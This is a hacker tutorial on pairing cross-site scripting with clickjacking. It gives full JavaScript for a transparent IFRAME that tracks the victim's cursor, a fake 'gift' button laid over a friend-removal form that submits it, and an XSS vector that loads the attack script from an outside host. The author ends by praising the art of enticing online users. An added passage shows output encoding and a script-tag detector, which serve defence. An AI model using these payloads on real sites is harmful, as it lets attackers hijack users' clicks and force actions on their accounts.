----- [0x01: Overview]
Clickjacking was recently discovered by two researchers, Jeremiah Grossman and Robert "RSnake" Hansen. It is a simple and effective attack.
We will quickly analyze how to combine two different techniques, XSS and Clickjacking, to make the attack more effective.
----------------------------------------------------------------------------------------------------------------------------------
----- [0x02: JavaScript always loves us]
Of course, we will use some JavaScript code to carry out our attack plans, trying two different methods in particular:
-0x02a = create an IFRAME that follows the cursor, so that the user is forced to click inside it;
-0x02b = create some specialized HTML code to overwrite part of another webpage.
----------------------------------------------------------------------------------------------------------------------------------
------ [0x02a: cursor tracking]
For the first Clickjacking attack, which we will call "cursor tracking", we use JavaScript to create a trap IFRAME.
The idea is simple: all we need is for the user to click a specific button or link, which forces him to perform some action inside a carefully designed, hidden IFRAME loaded into the website.
First, prepare the IFRAME code that we will load and that the user will click on:
    <iframe id="victim" src="http://target.com/page.php" scrolling="no"
            style="opacity: 0; position: absolute; left: 10px; bottom: 10px;"
            width="500"></iframe>
In this simple IFRAME declaration we must make sure that scrolling is disabled and that the "opacity" attribute is set to 0, so that the victim page is hidden inside our webpage. The position of the IFRAME in the page depends on what the user is supposed to click. You may want to adjust it with:
    margin-top: X;
    margin-left: X;
Using negative values, you shift the framed page so that a different part of it is centered in the IFRAME.
The next step is to prepare a JavaScript function so that the code we inject into the page can track where the user's cursor is, and move the IFRAME exactly where we want it. The following is the event handler used.
    // Return the page coordinates of the cursor for a mouse event.
    function getPosition(e) {
        e = e || window.event;
        var cursor = { x: 0, y: 0 };
        if (e.pageX || e.pageY) {
            cursor.x = e.pageX;
            cursor.y = e.pageY;
        } else {
            // Older browsers: derive page coordinates from client coordinates plus scroll offset.
            var de = document.documentElement;
            var b = document.body;
            cursor.x = e.clientX + (de.scrollLeft || b.scrollLeft) - (de.clientLeft || 0);
            cursor.y = e.clientY + (de.scrollTop || b.scrollTop) - (de.clientTop || 0);
        }
        return cursor;
    }
This function returns the X and Y coordinates of the user's cursor on the webpage each time it is called.
    // Move the hidden IFRAME so that it sits under the cursor.
    function clickjacking(e) {
        var loadFrame = document.getElementById("victim");
        var curPos = getPosition(e);
        loadFrame.setAttribute('style', 'opacity: 0; position: absolute; top: '
            + (curPos.y - 80) + 'px; left: ' + (curPos.x - 15) + 'px;');
    }
Similarly, this one fetches the IFRAME, calls the previous "getPosition" function and rewrites the style attribute so that the IFRAME is placed at the new coordinates: this is the cursor-tracking function.
    if (window.captureEvents) window.captureEvents(Event.MOUSEMOVE); // legacy Netscape API, absent in modern browsers
    window.onmousemove = clickjacking;
This registers the MouseMove event handler, so that the "clickjacking" function is called every time the user moves the cursor on the webpage. With our JavaScript code so far, we create an IFRAME that follows the victim's cursor on the webpage and forces him to click a specific button.
Now let's output the IFRAME into the HTML document from JavaScript with document.write:
    document.write("<iframe id=\"victim\" src=\"http://target.com/page.php\" "
        + "scrolling=\"no\" style=\"opacity: 0; position: absolute; left: 10px; bottom: 10px;\" "
        + "width=\"500\"></iframe>");
This IFRAME code will be written into the vulnerable web page. Now we need to put everything together into the file that our XSS vector will include.
Our complete JavaScript code is as follows:
<!-- clickjacking.js -->
    // Return the page coordinates of the cursor for a mouse event.
    function getPosition(e) {
        e = e || window.event;
        var cursor = { x: 0, y: 0 };
        if (e.pageX || e.pageY) {
            cursor.x = e.pageX;
            cursor.y = e.pageY;
        } else {
            // Older browsers: derive page coordinates from client coordinates plus scroll offset.
            var de = document.documentElement;
            var b = document.body;
            cursor.x = e.clientX + (de.scrollLeft || b.scrollLeft) - (de.clientLeft || 0);
            cursor.y = e.clientY + (de.scrollTop || b.scrollTop) - (de.clientTop || 0);
        }
        return cursor;
    }
    // Move the hidden IFRAME so that it sits under the cursor.
    function clickjacking(e) {
        var loadFrame = document.getElementById("victim");
        var curPos = getPosition(e);
        loadFrame.setAttribute('style', 'opacity: 0; position: absolute; top: '
            + (curPos.y - 80) + 'px; left: ' + (curPos.x - 15) + 'px;');
    }
    if (window.captureEvents) window.captureEvents(Event.MOUSEMOVE); // legacy Netscape API, absent in modern browsers
    window.onmousemove = clickjacking;
    document.write("<iframe id=\"victim\" src=\"http://www.2cto.com/page.php\" "
        + "scrolling=\"no\" style=\"opacity: 0; position: absolute; left: 10px; bottom: 10px;\" "
        + "width=\"500\"></iframe>");
----------------------------------------------------------------------------------------------------------------------------------
------ [0x02b: graphic overwrite]
Another method is to inject some HTML code into the webpage that covers an image or button with a fake one and invites the user to click on it.
For example, our victim visits a website page containing a form that allows him to remove a friend:
    <form method="POST" name="friends" action="remove.php">
        <div>Xiao Ming</div>
        <input type="hidden" name="friendid" value="123456" />
        <input type="submit" value="Remove from friends" />
    </form>
We want to force the user to remove "Xiao Ming". The JavaScript code we develop for this is as follows:
<!-- clickjacking.js -->
    // Submit the victim's own form on his behalf.
    function bonus() {
        document.friends.submit();
    }
    // X and Y are placeholders: the coordinates of the real "Remove from friends" button.
    document.write("<div style=\"position: absolute; top: Ypx; left: Xpx;\">"
        + "<input type=\"button\" value=\"Your friend sent you a gift, get it!\" onclick=\"bonus()\" />"
        + "</div>");
This creates a button at the X and Y coordinates that covers the "Remove from friends" button, so that the real one is hidden from the user.
This is just one example of how the overwrite technique can be used. Another variant replaces the original login form, positioned with the TOP and LEFT style attributes on the webpage.
----------------------------------------------------------------------------------------------------------------------------------
----- [0x03: XSS finished!]
Assuming that the same web page our victim visits is vulnerable to cross-site scripting, we can inject our forged JavaScript code to deploy our XSS-Clickjacking, and almost all victims will fall for it.
    <script src=http://www.2cto.com/clickjacking.js></script>
This is our XSS vector. It makes the victim's browser execute our JavaScript code: as we have seen, the injection can be done through a URL GET parameter or a user input form.
"Obviously, an XSS vulnerability requires some prior spreading. For victims to find the malicious link, they should be given what they want."
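Both the cursor-tracking IFRAME (0x02a) and the graphic overwrite (0x02b) depend on this one injection point: a GET parameter or form field that the page reflects into its HTML without encoding. The following Node.js code is an added example, not from the original article: it places the vulnerable reflection beside the hardened one, using the article's own carrier tag as the sample input, and adds a small check a tester can run over rendered output. The parameter name "q" and the page fragment are assumptions.

```javascript
// Added example (not the article's code): reflected parameter, vulnerable and
// hardened, plus a detection helper. Node.js, standard library only.
'use strict';

// The article's XSS carrier, used here as constructed sample input.
const CARRIER = '<script src=http://www.2cto.com/clickjacking.js></script>';

function getParam(query, name) {
  return new URLSearchParams(query).get(name) || '';
}

// Vulnerable: the GET parameter is written into the page verbatim, so the
// carrier becomes live markup and clickjacking.js runs in the victim's browser.
function renderVulnerable(query) {
  return '<p>You searched for: ' + getParam(query, 'q') + '</p>';
}

// Hardened: encode the characters HTML uses for markup before reflecting.
// The browser then shows the text of the tag instead of executing it.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderHardened(query) {
  return '<p>You searched for: ' + escapeHtml(getParam(query, 'q')) + '</p>';
}

// Detection helper for a scanner or a response log: does rendered output
// contain a script element the template never meant to emit?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Build the query string an attacker-supplied link would carry (constructed).
function carrierQuery() {
  return 'q=' + encodeURIComponent(CARRIER);
}
```

Feeding `carrierQuery()` to `renderVulnerable` yields a page with a live script element, which is exactly the condition section 0x03 relies on; `renderHardened` yields `&lt;script src=...&gt;`, which the browser renders as inert text. Output encoding at the point of reflection, applied to every reflected value, closes both the IFRAME and the overlay variant at once.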
----------------------------------------------------------------------------------------------------------------------------------
----- [0x04: Conclusion]
Clickjacking is a very interesting attack technique for getting more out of cross-site scripting vulnerabilities.
The most interesting thing about this attack is that it leaves a lot of room for attackers to exercise their creativity, so that they can better practise the lofty art of enticing online users.
If possible, once you have created a new or smarter attack method, you can invite me to share it together --> Hack01 [at] Live {dot} cn
# The HacKeR NetSpy [czy]